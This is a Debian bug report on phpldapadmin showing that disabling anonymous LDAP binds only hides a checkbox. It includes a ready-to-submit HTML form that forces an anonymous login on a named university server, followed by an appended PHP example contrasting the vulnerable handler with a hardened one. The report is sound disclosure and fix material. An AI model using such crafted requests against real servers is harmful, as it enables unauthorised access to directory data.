Package: phpldapadmin
Version: 0.9.6c-4
Severity: critical
Tags: security

Even if you deny anonymous login with disable_anon_bind, anyone could
access your LDAP server.

As far as I can see, this option only hides the checkbox on the input page, but
anyone can create a workaround hack:

==========example form to log into eol.lvk.cs.msu.su========
<html><body>

<form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php"
method="post" name="login_form">
<input type="hidden" name="server_id" value="0" />
<input type="checkbox" name="anonymous_bind" checked />
<input type="submit" name="submit" value="login" />
</form>

</body></html>
=============================================================

I think that the version in sarge is also vulnerable to this trick.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages phpldapadmin depends on:
ii  apache [httpd]               1.3.33-6    versatile, high-performance HTTP s
ii  debconf                      1.4.30.13   Debian configuration management sy
ii  php4                         4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-cgi                     4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-ldap                    4:4.3.10-15 LDAP module for php4

-- debconf information:
  phpldapadmin/ldap-bindpw: secret
  phpldapadmin/ldap-tls: false
  phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
* phpldapadmin/reconfigure-webserver: apache
* phpldapadmin/restart-webserver: true
  phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
  phpldapadmin/ldap-server: localhost
* phpldapadmin/ldap-authtype: cookie


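The defect the report describes, beside the server-side check that closes it, as an added example that is not phpldapadmin's own login.php. It assumes a config layout of $servers[$server_id]['disable_anon_bind'] and the field names from the report's form; both the layout and the helper names are assumptions.

```php
<?php
// Added example, not phpldapadmin's code. Assumed config layout:
// $servers[$server_id]['disable_anon_bind'] (boolean).

// What the report describes: the option only decides whether the checkbox
// is drawn. A hand-built POST can still send the field.
function render_anon_checkbox(array $servers, $id) {
    if (empty($servers[$id]['disable_anon_bind'])) {
        return '<input type="checkbox" name="anonymous_bind" />';
    }
    return '';   // hidden in the page, but not enforced anywhere else
}

// Vulnerable handler: never looks at the option, trusts the posted field.
function vulnerable_bind_params(array $post) {
    if (isset($post['anonymous_bind'])) {
        return array('dn' => '', 'pass' => '');   // anonymous bind proceeds
    }
    return array('dn' => $post['login_dn'], 'pass' => $post['login_pass']);
}

// Hardened handler: re-checks the option on the server, rejects unknown
// server ids, and refuses empty credentials (an LDAP bind with an empty
// password is itself an unauthenticated, i.e. anonymous, bind).
function hardened_bind_params(array $servers, array $post) {
    $id = isset($post['server_id']) ? (int) $post['server_id'] : -1;
    if (!isset($servers[$id])) {
        return null;
    }
    $anon_allowed = empty($servers[$id]['disable_anon_bind']);
    if (isset($post['anonymous_bind'])) {
        return $anon_allowed ? array('dn' => '', 'pass' => '') : null;
    }
    $dn   = isset($post['login_dn'])   ? trim($post['login_dn']) : '';
    $pass = isset($post['login_pass']) ? $post['login_pass']     : '';
    if ($dn === '' || $pass === '') {
        return null;   // would otherwise degrade into an anonymous bind
    }
    return array('dn' => $dn, 'pass' => $pass);
}

// Constructed request mirroring the report's hand-built form (server 0 has
// anonymous binds disabled).
$servers = array(0 => array('disable_anon_bind' => true));
$post    = array('server_id' => '0', 'anonymous_bind' => 'on', 'submit' => 'login');
if (vulnerable_bind_params($post) !== null) {
    echo "vulnerable handler: proceeds with an anonymous bind\n";
}
if (hardened_bind_params($servers, $post) === null) {
    echo "hardened handler: login refused\n";
}
```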